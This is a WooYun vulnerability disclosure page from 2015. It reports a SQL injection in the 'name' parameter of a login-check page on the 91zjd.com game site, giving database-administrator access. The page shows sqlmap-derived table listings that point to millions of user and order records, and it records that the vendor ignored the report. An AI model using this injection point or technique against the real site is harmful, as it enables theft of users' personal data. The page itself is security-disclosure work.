当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144659

漏洞标题:紫金岛游戏主站root权限SQL注入200w用户信息千万用户订单信息泄露

相关厂商:91zjd.com

漏洞作者: 路人甲

提交时间:2015-10-03 16:44

修复时间:2015-10-13 09:00

公开时间:2015-10-13 09:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-03: 细节已通知厂商并且等待厂商处理中
2015-10-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

紫金岛游戏主站root权限SQL注入200w用户信息千万用户订单信息泄露

详细说明:

注入点:http://www.91zjd.com/checkusername.aspx?name=
name参数加单引号直接报错,如图:

1.jpg


sqlmap截图:

2.jpg


当前数据库信息:

3.jpg


DBA权限:

4.jpg


数据库信息
dbo.UserMemberOrder | 10342305 为1000w用户订单信息
dbo.View_Userinfo_ME | 2172389 为200w+用户信息

Database: QPGameUserDB
+----------------------------------+---------+
| Table | Entries |
+----------------------------------+---------+
| dbo.View_UserALLLogo_bySpid | 116799666
| dbo.View_UserALLLogo_bySpid | 116799666
| dbo.UserMemberOrder | 10342305
| dbo.View_UserFristLogo | 7304127 |
| dbo.View_VWUserFristLogo | 7200557 |
| dbo.View_UserLogoNew | 7010453 |
| dbo.View_UserLogoNew | 7010453 |
| dbo.GoldEggsLog2012 | 3307940 |
| dbo.View_Userinfo_ME | 2172389 |
| dbo.IndividualDatumScore | 2142378 |
| dbo.GoldEggsLog20110 | 540730 |
| dbo.GoldEggsLog20110 | 540730 |
| dbo.GoldEggsLog20110 | 540730 |
| dbo.Yjt_accounts | 500000 |
| dbo.View_CZK_TG | 357304 |
| dbo.Rechargeable_Card_TEST | 356249 |
| dbo.Rechargeable_Card_TEST | 356249 |
| dbo.DailyLogonPrize | 307370 |
| dbo.ShortUrlLink | 178294 |
| dbo.accountsinfo20110101 | 117381 |
| dbo.QQcdkey | 99694 |
| dbo.IndividualDatumFirend | 78305 |
| dbo.AccountsInfo0821 | 76835 |
| dbo.AccountsInfo_temp1 | 54253 |
| dbo.AccountsInfo_temp1 | 54253 |
| dbo.View_Rechargeable_Card_tg | 14130 |
| dbo.AccountsInfo_emailbak | 11156 |
| dbo.AccountsInfo_emailbak | 11156 |
| dbo.GameIdentifier | 10001 |
| dbo.UserWincountlogo | 8250 |
| dbo.iphonetemp1 | 6195 |
| dbo.iphonetemp1 | 6195 |
| dbo.iphonetemp2 | 4774 |
| dbo.AccountsInfo1121 | 4569 |
| dbo.dxuserall | 3148 |
| dbo.dxuserall | 3148 |
| dbo.GameUserBang_TYBLogo | 2358 |
| dbo.SystemStreamInfo | 2325 |
| dbo.AccountsInfo_regtj | 2253 |
| dbo.View_AccountsInfo_regtjNew | 2253 |
| dbo.View_AccountsInfo_regtjNew | 2253 |
| dbo.tempUsername | 2079 |
| dbo.dxUserbak | 1651 |
| dbo.GameUserBang_abestLogo | 1465 |
| dbo.GameUserBang_abest_view | 748 |
| dbo.GameUserBang_abest_view | 748 |
| dbo.AccountsInfobak | 736 |
| dbo.IndividualDatumbak | 550 |
| dbo.IndividualDatumbak | 550 |
| dbo.PK_SOURCE_IP_POOL | 541 |
| dbo.LuckUser | 393 |
| dbo.AccountsInfo_xt | 352 |
| dbo.UserAddScoreLogo | 325 |
| dbo.VW_Charge_List | 300 |
| dbo.dxuserlist | 209 |
| dbo.S3_Tmp | 156 |
| dbo.GameUserBang_New_tyb | 93 |
| dbo.GameUserBang_TYB_WEEKLY_view | 93 |
| dbo.GameUserBang_TYB_WEEKLY_view | 93 |
| dbo.View_t1 | 47 |
| dbo.test_0801 | 46 |
| dbo.tempcity | 41 |
| dbo.we | 35 |
| dbo.View_t320 | 29 |
| dbo.comd_list | 26 |
| dbo.ConfineContent | 26 |
| dbo.D99_CMD | 24 |
| dbo.D99_Tmp | 22 |
| dbo.PK_GameDownloadCount | 19 |
| dbo.View_t500 | 17 |
| dbo.View_t310 | 14 |
| dbo.ConfineAddress | 3 |
| dbo.PK_WebPage_Click_Count | 3 |
| dbo.SystemStatusInfo | 2 |
| dbo.D99_REG | 1 |
| dbo.DIY_TEMPCOMMAND_TABLE | 1 |
+----------------------------------+---------+


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-13 09:00

厂商回复:

漏洞Rank:20 (WooYun评价)

最新状态:

暂无